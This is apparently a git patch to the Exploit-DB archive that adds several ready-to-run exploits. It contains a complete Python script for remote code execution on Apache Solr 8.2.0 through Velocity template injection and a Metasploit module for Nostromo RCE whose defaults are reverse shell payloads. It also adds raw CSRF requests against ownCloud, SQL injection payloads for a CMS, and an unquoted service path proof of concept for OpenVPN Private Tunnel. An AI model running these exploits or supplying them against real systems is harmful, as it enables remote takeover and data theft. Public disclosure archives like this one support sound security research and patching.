From 47d2a76f4f63b2bec017333ab2699344088ed55e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 2 Nov 2019 05:01:41 +0000 Subject: [PATCH] DB: 2019-11-02 7 changes to exploits/shellcodes OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path Nostromo - Directory Traversal Remote Command Execution (Metasploit) TheJshen contentManagementSystem 1.04 - 'id' SQL Injection ownCloud 10.3.0 stable - Cross-Site Request Forgery Apache Solr 8.2.0 - Remote Code Execution --- exploits/java/webapps/47572.py | 195 +++++++++++++++++++++ exploits/linux/webapps/47571.txt | 280 ++++++++++++++++++++++++++++++ exploits/multiple/remote/47573.rb | 134 ++++++++++++++ exploits/php/webapps/47569.txt | 25 +++ exploits/unix/remote/47080.c | 2 +- exploits/unix/remote/764.c | 1 + exploits/windows/local/47570.txt | 39 +++++ files_exploits.csv | 5 + 8 files changed, 680 insertions(+), 1 deletion(-) create mode 100755 exploits/java/webapps/47572.py create mode 100644 exploits/linux/webapps/47571.txt create mode 100755 exploits/multiple/remote/47573.rb create mode 100644 exploits/php/webapps/47569.txt create mode 100644 exploits/windows/local/47570.txt diff --git a/exploits/java/webapps/47572.py b/exploits/java/webapps/47572.py new file mode 100755 index 000000000..bc1990bc6 --- /dev/null +++ b/exploits/java/webapps/47572.py @@ -0,0 +1,195 @@ +# Title: Apache Solr 8.2.0 - Remote Code Execution +# Date: 2019-11-01 +# Author: @l3x_wong +# Vendor: https://lucene.apache.org/solr/ +# Software Link: https://lucene.apache.org/solr/downloads.html +# CVE: N/A +# github: https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template + +# usage: python3 script.py ip [port [command]] +# default port=8983 +# default command=whoami +# note: +# Step1: Init Apache Solr Configuration +# Step2: Remote Exec in Every Solr Node + +import sys +import json +import time +import requests + + +class initSolr(object): + + timestamp_s = str(time.time()).split('.') + timestamp = timestamp_s[0] + timestamp_s[1][0:-3] + + def __init__(self, ip, port): + self.ip = ip + self.port = port + + def get_nodes(self): + payload = { + '_': self.timestamp, + 'indexInfo': 'false', + 'wt': 'json' + } + url = 'http://' + self.ip + ':' + self.port + '/solr/admin/cores' + + try: + nodes_info = requests.get(url, params=payload, timeout=5) + node = list(nodes_info.json()['status'].keys()) + state = 1 + except: + node = '' + state = 0 + + if node: + return { + 'node': node, + 'state': state, + 'msg': 'Get Nodes Successfully' + } + else: + return { + 'node': None, + 'state': state, + 'msg': 'Get Nodes Failed' + } + + def get_system(self): + payload = { + '_': self.timestamp, + 'wt': 'json' + } + url = 'http://' + self.ip + ':' + self.port + '/solr/admin/info/system' + try: + system_info = requests.get(url=url, params=payload, timeout=5) + os_name = system_info.json()['system']['name'] + os_uname = system_info.json()['system']['uname'] + os_version = system_info.json()['system']['version'] + state = 1 + + except: + os_name = '' + os_uname = '' + os_version = '' + state = 0 + + return { + 'system': { + 'name': os_name, + 'uname': os_uname, + 'version': os_version, + 'state': state + } + } + + +class apacheSolrRCE(object): + + def __init__(self, ip, port, node, command): + self.ip = ip + self.port = port + self.node = node + self.command = command + self.url = "http://" + self.ip + ':' + self.port + '/solr/' + self.node + + def init_node_config(self): + url = self.url + '/config' + payload = { + 'update-queryresponsewriter': { + 'startup': 'lazy', + 'name': 'velocity', + 'class': 'solr.VelocityResponseWriter', + 'template.base.dir': '', + 'solr.resource.loader.enabled': 'true', + 'params.resource.loader.enabled': 'true' + } + } + try: + res = requests.post(url=url, data=json.dumps(payload), timeout=5) + if res.status_code == 200: + return { + 'init': 'Init node config successfully', + 'state': 1 + } + else: + return { + 'init': 'Init node config failed', + 'state': 0 + } + except: + return { + 'init': 'Init node config failed', + 'state': 0 + } + + def rce(self): + url = self.url + ("/select?q=1&&wt=velocity&v.template=custom&v.template.custom=" + "%23set($x=%27%27)+" + "%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+" + "%23set($chr=$x.class.forName(%27java.lang.Character%27))+" + "%23set($str=$x.class.forName(%27java.lang.String%27))+" + "%23set($ex=$rt.getRuntime().exec(%27" + self.command + + "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+" + "%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end") + try: + res = requests.get(url=url, timeout=5) + if res.status_code == 200: + try: + if res.json()['responseHeader']['status'] == '0': + return 'RCE failed @Apache Solr node %s\n' % self.node + else: + return 'RCE failed @Apache Solr node %s\n' % self.node + except: + return 'RCE Successfully @Apache Solr node %s\n %s\n' % (self.node, res.text.strip().strip('0')) + + else: + return 'RCE failed @Apache Solr node %s\n' % self.node + except: + return 'RCE failed @Apache Solr node %s\n' % self.node + + +def check(ip, port='8983', command='whoami'): + system = initSolr(ip=ip, port=port) + if system.get_nodes()['state'] == 0: + print('No Nodes Found. Remote Exec Failed!') + else: + nodes = system.get_nodes()['node'] + systeminfo = system.get_system() + os_name = systeminfo['system']['name'] + os_version = systeminfo['system']['version'] + print('OS Realese: %s, OS Version: %s\nif remote exec failed, ' + 'you should change your command with right os platform\n' % (os_name, os_version)) + + for node in nodes: + res = apacheSolrRCE(ip=ip, port=port, node=node, command=command) + init_node_config = res.init_node_config() + if init_node_config['state'] == 1: + print('Init node %s Successfully, exec command=%s' % (node, command)) + result = res.rce() + print(result) + else: + print('Init node %s Failed, Remote Exec Failed\n' % node) + + +if __name__ == '__main__': + usage = ('python3 script.py ip [port [command]]\n ' + '\t\tdefault port=8983\n ' + '\t\tdefault command=whoami') + + if len(sys.argv) == 4: + ip = sys.argv[1] + port = sys.argv[2] + command = sys.argv[3] + check(ip=ip, port=port, command=command) + elif len(sys.argv) == 3: + ip = sys.argv[1] + port = sys.argv[2] + check(ip=ip, port=port) + elif len(sys.argv) == 2: + ip = sys.argv[1] + check(ip=ip) + else: + print('Usage: %s:\n' % usage) \ No newline at end of file diff --git a/exploits/linux/webapps/47571.txt b/exploits/linux/webapps/47571.txt new file mode 100644 index 000000000..7447fba93 --- /dev/null +++ b/exploits/linux/webapps/47571.txt @@ -0,0 +1,280 @@ +# Exploit Title: ownCloud 10.3.0 stable - Cross-Site Request Forgery +# Date: 2019-10-31 +# Exploit Author: Ozer Goker +# Vendor Homepage: https://owncloud.org +# Software Link: https://owncloud.org/download/ +# Version: 10.3 +# CVE: N/A + +# Introduction +# Your personal cloud collaboration platform With over 50 million users +# worldwide, ownCloud is the market-leading open source software for +# cloud-based collaboration platforms. As an alternative to Dropbox, OneDrive +# and Google Drive, ownCloud offers real data security and privacy for you +# and your data. + +################################################################################################################################## + +# CSRF1 +# Create Folder + +MKCOL /remote.php/dav/files/user/test HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +requesttoken: +VREONXtUByUsCkMAcRscHjUGHjYGPBoHJQgsfzoHWEk=:fUCe0mdAzn0T3MNKlKqYMEBFcezMTukbmbVeDs+jKlo= +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + + +################################################################################################################################## + +# CSRF2 +# Delete Folder + +DELETE /remote.php/dav/files/user/test HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +requesttoken: +HDQcAi5jLSkkKysEGiYxZSA7PhcaCWEYFydhQ106YEM=:/pQReZNMrOXPXpc0yvQxQp9YQJ7q3HShA9D2+R2EJuI= +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + + +################################################################################################################################## + +# CSRF3 +# Create User + +POST /index.php/settings/users/users HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +eRIlHRIBJF0jU1w9CSY+AT8CX18gTh90JV8UQwQdfEg=:JVhMY8G9u7/iKplTfO00k7G5c2BqjoOcCWkAHYdZV5I= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 39 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +username=test&password=&email=test@test + + + +################################################################################################################################## + +# CSRF4 +# Delete User + +DELETE /index.php/settings/users/users/test HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +requesttoken: +BQ8vIjp9LjACFxwEB2QkMSsuG14kHy4SKio6URckUlk=:6KbrqDMTTsoPE2vdrct1ofvSlGlcyVarSAOFV9PFuLQ= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + + +################################################################################################################################## + +# CSRF5 +# Create Group + +POST /index.php/settings/users/groups HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +BRd8ZDsAFREkB0YxdAIaYi8/ABsyCBIDExs/Wgw9a28=:6S14p9vurc5e6TH7vrotyqJBUvihbOXDUWMKYbS23UU= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 7 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +id=test + + +################################################################################################################################## + +# CSRF6 +# Delete Group + +DELETE /index.php/settings/users/groups/test HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +requesttoken: +aTElBwBqTAUYEEQacjdgER4hJ0QIA20sdF00CwtHUm0=:ZuhWKS/aNt7N0a2DGlH+Cz5m20b9e5aFOSBKkqJOALw= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + + +################################################################################################################################## + +# CSRF7 +# Change User Full Name + +POST /index.php/settings/users/user/displayName HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +fzYYPjtaVBUeKj8CBzojJHIgXTkTTT4GbR0vBT4TCm0=:LrUnpc7qHNLVElqq+m2VX4fG+py7Pa9FK8DpB84dSdY= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 37 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +displayName=user1&oldDisplayName=user + + +################################################################################################################################## + +# CSRF8 +# Change User Email + +PUT /index.php/settings/users/user/mailAddress HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +QAkuGRpIMg88IzsXBTMeYREpCA4zLhcQHiMsQBo7WWo=:sMcIQqQkjGHCGeL4HdgaxWOQXNzrtIjAou6akezvpcI= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 31 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +mailAddress=user1%40example.com + + +################################################################################################################################## + +# CSRF9 +# Change User Password + + +POST /index.php/settings/personal/changepassword HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 62 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +oldpassword=1234&personal-password=1&personal-password-clone=1 + + +################################################################################################################################## + +# CSRF10 +# Change Language + +POST /index.php/settings/ajax/setlanguage.php HTTP/1.1 +Host: 192.168.2.111 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) +Gecko/20100101 Firefox/70.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +requesttoken: +fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU= +OCS-APIREQUEST: true +X-Requested-With: XMLHttpRequest +Content-Length: 7 +Origin: http://192.168.2.111 +DNT: 1 +Connection: close +Cookie: +oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; +ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k + +lang=tr + + +################################################################################################################################## \ No newline at end of file diff --git a/exploits/multiple/remote/47573.rb b/exploits/multiple/remote/47573.rb new file mode 100755 index 000000000..cbf10c8f6 --- /dev/null +++ b/exploits/multiple/remote/47573.rb @@ -0,0 +1,134 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::CmdStager + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Nostromo Directory Traversal Remote Command Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + Nostromo <= 1.9.6. This issue is caused by a directory traversal + in the function `http_verify` in nostromo nhttpd allowing an attacker + to achieve remote code execution via a crafted HTTP request. + }, + 'Author' => + [ + 'Quentin Kaiser ', # metasploit module + 'sp0re', # original public exploit + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2019-16278'], + [ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'], + ], + 'Platform' => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64], + 'Targets' => + [ + ['Automatic (Unix In-Memory)', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'} + } + ], + ['Automatic (Linux Dropper)', + { + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64], + 'Type' => :linux_dropper, + 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'} + } + ] + ], + 'DisclosureDate' => 'Oct 20 2019', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + )) + + register_advanced_options([ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ]) + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path), + } + ) + + unless res + vprint_error("Connection failed") + return CheckCode::Unknown + end + + if res.code == 200 and res.headers['Server'] =~ /nostromo [\d.]{5}/ + /nostromo (?[\d.]{5})/ =~ res.headers['Server'] + if Gem::Version.new(version) <= Gem::Version.new('1.9.6') + return CheckCode::Appears + end + end + + return CheckCode::Safe + end + + def execute_command(cmd, opts = {}) + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, '/.%0d./.%0d./.%0d./.%0d./bin/sh'), + 'headers' => {'Content-Length:' => '1'}, + 'data' => "echo\necho\n#{cmd} 2>&1" + } + ) + end + + def exploit + # These CheckCodes are allowed to pass automatically + checkcodes = [ + CheckCode::Appears, + CheckCode::Vulnerable + ] + + unless checkcodes.include?(check) || datastore['ForceExploit'] + fail_with(Failure::NotVulnerable, 'Set ForceExploit to override') + end + + print_status("Configuring #{target.name} target") + + case target['Type'] + when :unix_memory + print_status("Sending #{datastore['PAYLOAD']} command payload") + vprint_status("Generated command payload: #{payload.encoded}") + + res = execute_command(payload.encoded) + + if res && datastore['PAYLOAD'] == 'cmd/unix/generic' + print_warning('Dumping command output in full response body') + + if res.body.empty? + print_error('Empty response body, no command output') + return + end + + print_line(res.body) + end + when :linux_dropper + print_status("Sending #{datastore['PAYLOAD']} command stager") + execute_cmdstager + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47569.txt b/exploits/php/webapps/47569.txt new file mode 100644 index 000000000..e36df60a8 --- /dev/null +++ b/exploits/php/webapps/47569.txt @@ -0,0 +1,25 @@ +# Exploit Title: TheJshen contentManagementSystem 1.04 - 'id' SQL Injection +# Date: 2019-11-01 +# Exploit Author: Cakes +# Vendor Homepage: https://github.com/thejshen/contentManagementSystem +# Version: 1.04 +# Software Link: https://github.com/thejshen/contentManagementSystem.git +# Tested on: CentOS7 + +# GET parameter 'id' easy SQL Injection +--- +Parameter: id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: id=4' AND 5143=5143-- OWXt + Vector: AND [INFERENCE] + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG + Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + Type: UNION query + Title: Generic UNION query (NULL) - 5 columns + Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh + Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT] \ No newline at end of file diff --git a/exploits/unix/remote/47080.c b/exploits/unix/remote/47080.c index d85b157f5..94f5513dc 100644 --- a/exploits/unix/remote/47080.c +++ b/exploits/unix/remote/47080.c @@ -1,7 +1,7 @@ /* * OF version r00t VERY PRIV8 spabam * Version: v3.0.4 - * Requirements: libssl-dev + * Requirements: libssl-dev ( apt-get install libssl-dev ) * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto * objdump -R /usr/sbin/httpd|grep free to get more targets * #hackarena irc.brasnet.org diff --git a/exploits/unix/remote/764.c b/exploits/unix/remote/764.c index 595a9f2b6..4931ca1e2 100644 --- a/exploits/unix/remote/764.c +++ b/exploits/unix/remote/764.c @@ -1,4 +1,5 @@ /* + * E-DB Note: Updated exploit ~ https://www.exploit-db.com/exploits/47080 * E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ * * OF version r00t VERY PRIV8 spabam diff --git a/exploits/windows/local/47570.txt b/exploits/windows/local/47570.txt new file mode 100644 index 000000000..5f0a4b1ba --- /dev/null +++ b/exploits/windows/local/47570.txt @@ -0,0 +1,39 @@ +# Title: OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path +# Author: Sainadh Jamalpur +# Date: 2019-10-31 +# Vendor Homepage: https://openvpn.net/ +# Software Link: https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe +# Version : PrivateTunnel v2.8.4 +# Tested on: Windows 10 64bit(EN) +# CVE : N/A + +# ===================================================== +# 1. Description: +# Unquoted service paths in OpenVPN Private Tunnel v2.8.4 have an unquoted service path. + +#PoC +=========== +C:\>sc qc ovpnagent +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ovpnagent + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\OpenVPN +Technologies\PrivateTunnel\ovpnagent.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : OpenVPN Agent + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\> + +#Exploit: +============ +A successful attempt would require the local user to be able to insert +their code in the system root path undetected by the OS or other +security applications where it could potentially be executed during +application startup or reboot. If successful, the local user's code +would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 940f20eca..7d01591cb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10740,6 +10740,7 @@ id,file,description,date,author,type,platform,port 47551,exploits/windows/local/47551.py,"ChaosPro 2.0 - Buffer Overflow (SEH)",2019-10-28,SYANiDE,local,windows, 47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows, 47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows, +47570,exploits/windows/local/47570.txt,"OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path",2019-11-01,"Sainadh Jamalpur",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17746,6 +17747,7 @@ id,file,description,date,author,type,platform,port 47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution",2019-10-29,"Thomas Zuk",remote,windows, 47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows, 47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware, +47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41886,3 +41888,6 @@ id,file,description,date,author,type,platform,port 47561,exploits/xml/webapps/47561.txt,"Citrix StoreFront Server 7.15 - XML External Entity Injection",2019-10-30,"Vahagn Vardanyan",webapps,xml, 47562,exploits/hardware/webapps/47562.sh,"iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure",2019-10-30,LiquidWorm,webapps,hardware, 47567,exploits/php/webapps/47567.txt,"Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection",2019-10-31,"Princy Edward",webapps,php, +47569,exploits/php/webapps/47569.txt,"TheJshen contentManagementSystem 1.04 - 'id' SQL Injection",2019-11-01,cakes,webapps,php, +47571,exploits/linux/webapps/47571.txt,"ownCloud 10.3.0 stable - Cross-Site Request Forgery",2019-11-01,"Ozer Goker",webapps,linux, +47572,exploits/java/webapps/47572.py,"Apache Solr 8.2.0 - Remote Code Execution",2019-11-01,@l3x_wong,webapps,java,